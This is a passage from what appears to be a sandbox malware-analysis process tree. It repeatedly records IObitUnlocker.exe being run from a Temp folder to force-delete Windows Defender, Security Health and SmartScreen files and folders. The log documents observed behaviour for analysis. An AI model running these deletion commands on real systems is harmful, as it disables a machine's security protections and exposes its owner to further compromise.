Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 